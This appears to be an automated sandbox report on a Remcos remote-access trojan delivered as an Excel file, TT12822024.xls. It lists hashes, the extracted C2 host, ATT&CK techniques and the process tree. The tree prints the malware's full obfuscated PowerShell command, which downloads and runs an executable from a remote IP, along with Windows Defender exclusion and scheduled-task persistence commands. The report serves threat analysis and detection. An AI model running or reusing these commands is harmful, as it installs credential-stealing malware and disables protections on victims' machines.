remcos | 2fc21f78d38708b2fd7d776780305ae303ec4277e41241462d4cf3f94a779d29

Analysis

max time kernel
148s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-10-2024 05:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TT12822024.xls
Size

640KB
MD5

3e23db29ce7cdc215bac52c531aed525
SHA1

57286b0272df8386254ba0fbe340f0fba2cafbc8
SHA256

2fc21f78d38708b2fd7d776780305ae303ec4277e41241462d4cf3f94a779d29
SHA512

0dfe34dcf345a6d501ad6d20758b212f7c13af5181330fcdbad3598a748b155c811438bde78220efd26aa73ffe6273c639fea7d04ed2b7d32f1a58da43195843
SSDEEP

12288:ECf1SLuA5XvOZWQNb7/Aiy/vyEzrFdIiC1smRaAVpwnzI613rQdq:zMxxvXQ5/ny/v9r4PKqczI6NMd

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

hiddenrmcnew.duckdns.org:7839

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-PW8G0U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/2080-126-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/556-121-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2484-120-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2484-120-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/556-121-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	2600	mshta.exe
11	2600	mshta.exe
13	1080	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2232	powershell.exe
2016	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
1080	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
600	dllhost.exe
960	dllhost.exe
556	dllhost.exe
2484	dllhost.exe
2080	dllhost.exe

Loads dropped DLL 1 IoCs

pid	Process
1080	powershell.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	dllhost.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 600 set thread context of 960	600	dllhost.exe	44
PID 960 set thread context of 556	960	dllhost.exe	45
PID 960 set thread context of 2484	960	dllhost.exe	46
PID 960 set thread context of 2080	960	dllhost.exe	47

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2960	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2660	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1080	powershell.exe
1080	powershell.exe
1080	powershell.exe
600	dllhost.exe
2016	powershell.exe
2232	powershell.exe
600	dllhost.exe
556	dllhost.exe
556	dllhost.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
960	dllhost.exe
960	dllhost.exe
960	dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	600	dllhost.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	2080	dllhost.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2660	EXCEL.EXE
2660	EXCEL.EXE
2660	EXCEL.EXE
2660	EXCEL.EXE
2660	EXCEL.EXE

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 2600 wrote to memory of 1868	2600	mshta.exe	31
PID 2600 wrote to memory of 1868	2600	mshta.exe	31
PID 2600 wrote to memory of 1868	2600	mshta.exe	31
PID 2600 wrote to memory of 1868	2600	mshta.exe	31
PID 1868 wrote to memory of 1080	1868	cmd.exe	33
PID 1868 wrote to memory of 1080	1868	cmd.exe	33
PID 1868 wrote to memory of 1080	1868	cmd.exe	33
PID 1868 wrote to memory of 1080	1868	cmd.exe	33
PID 1080 wrote to memory of 1288	1080	powershell.exe	35
PID 1080 wrote to memory of 1288	1080	powershell.exe	35
PID 1080 wrote to memory of 1288	1080	powershell.exe	35
PID 1080 wrote to memory of 1288	1080	powershell.exe	35
PID 1288 wrote to memory of 596	1288	csc.exe	36
PID 1288 wrote to memory of 596	1288	csc.exe	36
PID 1288 wrote to memory of 596	1288	csc.exe	36
PID 1288 wrote to memory of 596	1288	csc.exe	36
PID 1080 wrote to memory of 600	1080	powershell.exe	37
PID 1080 wrote to memory of 600	1080	powershell.exe	37
PID 1080 wrote to memory of 600	1080	powershell.exe	37
PID 1080 wrote to memory of 600	1080	powershell.exe	37
PID 600 wrote to memory of 2016	600	dllhost.exe	38
PID 600 wrote to memory of 2016	600	dllhost.exe	38
PID 600 wrote to memory of 2016	600	dllhost.exe	38
PID 600 wrote to memory of 2016	600	dllhost.exe	38
PID 600 wrote to memory of 2232	600	dllhost.exe	40
PID 600 wrote to memory of 2232	600	dllhost.exe	40
PID 600 wrote to memory of 2232	600	dllhost.exe	40
PID 600 wrote to memory of 2232	600	dllhost.exe	40
PID 600 wrote to memory of 2960	600	dllhost.exe	41
PID 600 wrote to memory of 2960	600	dllhost.exe	41
PID 600 wrote to memory of 2960	600	dllhost.exe	41
PID 600 wrote to memory of 2960	600	dllhost.exe	41
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 600 wrote to memory of 960	600	dllhost.exe	44
PID 960 wrote to memory of 556	960	dllhost.exe	45
PID 960 wrote to memory of 556	960	dllhost.exe	45
PID 960 wrote to memory of 556	960	dllhost.exe	45
PID 960 wrote to memory of 556	960	dllhost.exe	45
PID 960 wrote to memory of 556	960	dllhost.exe	45
PID 960 wrote to memory of 2484	960	dllhost.exe	46
PID 960 wrote to memory of 2484	960	dllhost.exe	46
PID 960 wrote to memory of 2484	960	dllhost.exe	46
PID 960 wrote to memory of 2484	960	dllhost.exe	46
PID 960 wrote to memory of 2484	960	dllhost.exe	46
PID 960 wrote to memory of 2080	960	dllhost.exe	47
PID 960 wrote to memory of 2080	960	dllhost.exe	47
PID 960 wrote to memory of 2080	960	dllhost.exe	47
PID 960 wrote to memory of 2080	960	dllhost.exe	47
PID 960 wrote to memory of 2080	960	dllhost.exe	47

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TT12822024.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2660

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C POwErShell -EX bYpasS -Nop -w 1 -C DEvIcECreDeNtialDEPlOYmEnt.exE ; ieX($(Iex('[SYStEm.TeXt.enCOdINg]'+[CHAr]0X3A+[chAR]0x3A+'utF8.GetSTriNG([sYstEm.coNveRt]'+[chAR]0X3A+[ChAR]0x3a+'froMBase64StrinG('+[CHAr]34+'JHNzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlRmlOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFaUXksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2pVd2NUYkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGtMLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnBwZU9uKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHROTGNwZUVvQWNrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzczo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvOTAvZGxsaG9zdC5leGUiLCIkZU5WOkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RBUnQtU0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[chAR]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1868
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POwErShell -EX bYpasS -Nop -w 1 -C DEvIcECreDeNtialDEPlOYmEnt.exE ; ieX($(Iex('[SYStEm.TeXt.enCOdINg]'+[CHAr]0X3A+[chAR]0x3A+'utF8.GetSTriNG([sYstEm.coNveRt]'+[chAR]0X3A+[ChAR]0x3a+'froMBase64StrinG('+[CHAr]34+'JHNzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlRmlOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFaUXksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2pVd2NUYkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGtMLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnBwZU9uKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHROTGNwZUVvQWNrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzczo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvOTAvZGxsaG9zdC5leGUiLCIkZU5WOkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RBUnQtU0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[chAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5xta2-8k.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1288
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES974.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC973.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:596
  - - C:\Users\Admin\AppData\Roaming\dllhost.exe
      "C:\Users\Admin\AppData\Roaming\dllhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:600
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dllhost.exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2016
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ZukuCcvWAQW.exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZukuCcvWAQW" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4F48.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2960
    - - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        "C:\Users\Admin\AppData\Roaming\dllhost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:960
      - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        C:\Users\Admin\AppData\Roaming\dllhost.exe /stext "C:\Users\Admin\AppData\Local\Temp\bhutcswwxiiizhldpxjqubionp"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:556
      - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        C:\Users\Admin\AppData\Roaming\dllhost.exe /stext "C:\Users\Admin\AppData\Local\Temp\ebhedkoplqanbnahyiwkfgdxvwemw"
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2484
      - C:\Users\Admin\AppData\Roaming\dllhost.exe
        
        C:\Users\Admin\AppData\Roaming\dllhost.exe /stext "C:\Users\Admin\AppData\Local\Temp\oemweczrzysamcwtpsilitxoedvvpgrz"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
e6ce1ffc785d5032a05f4d71aa729a51

SHA1
2526830f89a97e8f18484e1736676bd45dc86d9c

SHA256
314b6d337d92145251b6114af5be270d54485301346400ad824f0450fa0a2e23

SHA512
236ed54eb93437f5698f4a7030ffbd4ba967904dfbfa5d74886427fcc0b9838a22d3c8baa3be9132b32d955e6a5c9732052e55ebbb690c82c51d2d2042624151

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c5dae4a9444940ce59cdc2bd249c32e5

SHA1
395f118750b141f057468bba1875995704c117fd

SHA256
37c9176604594f47bad755bd4b95d51f7b8a154ec5fb2c09d67957874fc964f6

SHA512
9796910479527ca75a4aabcc8cd0777d9c5aa707f591f32571f21795b7f705620baf7a9e1ded9e9157514c0e4b1422d26e1dd3b89a8a6853759c4ece2e00a057

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d1bccb1d3a00dff69c0be6b22d4f5c8f

SHA1
e57fb9ac6509566bed5c94683e08dbecf76eb97f

SHA256
6f71a0f224cd234f8a4322b73ce52d415b1b543c3dc7466cee6f6c9ad567bf3c

SHA512
507283d46197f47b5d36bca66da6e1ceeccd93eb501a76d4fb9ad2b35e1bdc83987b8c0533941763add23ad16c394fb26f767487d1d4ec3c3ba78ce90499d82d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\IEnetsatwithnewthingstobeonline[1].hta

Filesize
8KB

MD5
d9ac57b5892373b3bedbfa2b40c7c0d2

SHA1
51293feca6b9ac5eeae0d2787ddcbb63ce42562e

SHA256
6c9ea8439a54ca2306b9e8c32b153db150b16c4cdb3e83a5fafb0b92c1c26318

SHA512
dda99fed1c86c9f232ddd9778e5107ec4d45885afd5ee528a3fb62c08898b40dab66c631fe46bce96a6f205ab9b12b0029c81ca510bc0cf4411cdcbb90a5e034

Download Submit
C:\Users\Admin\AppData\Local\Temp\5xta2-8k.dll

Filesize
3KB

MD5
11325061bf4196c60e7ce8b9f444cae4

SHA1
261604292e766b815b507180e7955f12143e963a

SHA256
044a502baba4e6401c4c6bab7ca3e045befacc3f09e20ef622a3986a8d52c551

SHA512
cf652ef6dc41097efd5f4fe94e142026d0bf53d9209ede25c4761e2207d2580ec6033c87d13a77c923846d0d7e306d144d01249681c23301b23c6c11ca18cb4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5xta2-8k.pdb

Filesize
7KB

MD5
9d8cca5b396e8e743a55a7d5db91f819

SHA1
9986e22abbbdb5b7f5be848bc8b551d01ad19809

SHA256
56cf70d68b38d0e793434e98c3ca32d2c5ac937d15edecde4fa47227311590f2

SHA512
0469084fd9363bb8fd7409ffa4921aaf1aa59995dd86668a8f788e1151c761ce0d6d7a89960a8e524bfd0fe1a7dee980592ef306f7c79772dcd9c8e4e0ecb2af

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab1D5.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES974.tmp

Filesize
1KB

MD5
d1b7e38b8490da4787dcd570d639f30b

SHA1
b633e5b11b3643bb7f44ffdb7a870c077bb8a825

SHA256
5ce3c93db05ef98566bcc2971eb070f39ad5a402fd54ddf0ae0b5cca34c00fe6

SHA512
949ffe26fa47a1eb8fa52ff0bc3057cb49a1fcdab46979a7e51bf1dcda7b351ca93b3bb8c9b6abbd6d674c74bb96155e18ddfd45f9317c3cfcbb468fe641d4ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\bhutcswwxiiizhldpxjqubionp

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4F48.tmp

Filesize
1KB

MD5
b46a45b1b7228e4cae0f2c3f3462e76c

SHA1
44e3c3ec527b755f66c57738390e6b32cd979483

SHA256
e8addce07729247f4ca2287313372320d90a5c7596af3f639adc78c38f791069

SHA512
71e71ceb52823a532925ceac1f068c8bfb96583f23ae873b88c0aa6b8f28a730e2239e16179a82eecd51c5bc4b4fe9227d8e64f71c310bc1a40863aa2e93e91e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ICGXP9O2PUHN7NKX9T41.temp

Filesize
7KB

MD5
c437e5a0ccd34cf08b425e244f14bef7

SHA1
1f8027d8237691b9deb76c91cae3d67e78b2efb9

SHA256
d11dad8cf5f2541094d45f708361cdf72d779a9278e5b5a5bd47661f55eee47c

SHA512
61593200f2a8dd1bcb74457bde4ac358aad35079b90a4faa4d42df4aa05baf4a46cb725b5b05b8bec71efd07af384a1e99861f66022669cc7ff4c0692d64d906

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1.0MB

MD5
06288ac34c34b1751dca19951d6140f8

SHA1
e3af412db4368c7a3c7b3a0a812c2af6903bb697

SHA256
156b1cea1a2f649e332be482047de3d368f5f7b7e93eb4821692ada17a69fc75

SHA512
47cd551807523783db43570df4d3ab4edb52699b8a118b91453c12aa5c5ca3b746a023ce6b5b0561754f876671136312b9aa725d6a8c5fec0ef004231caaf039

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5xta2-8k.0.cs

Filesize
474B

MD5
05338ab0e37f31858e4a873718421680

SHA1
fadcc6745b125528cfd1679cdd99e393931c8b52

SHA256
22258adafef6f05af8039a4829b9c288f006485a0d1f7b96d5e47c1d7fb2d49c

SHA512
304591d6b3dcbba265285fd5719357327ebecbbdf3e18bc7c81db2046a355b0bfd2e68e64aa2160bc764fbfd68b5415c54eb8e7999ff4d875ec4987f6096f403

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5xta2-8k.cmdline

Filesize
309B

MD5
56bfe0205e52eb68035611b203024926

SHA1
7f498c567d6c369d1073307fc8d96e713fea3b73

SHA256
4a29044ec3081f2a6f16165358a0fe46c73b8ab627ff046e4671d47e775d7d2f

SHA512
797f34a9d1ea61da36de108247cf581ba444cfb883c5a288a9a8c0d8a00667337163fd36cb151ee7cd82189e88717aafffbf76f13ea76e523b4dfa6ff225dc5a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC973.tmp

Filesize
652B

MD5
506368a5069252b0c3d7488e33efe21a

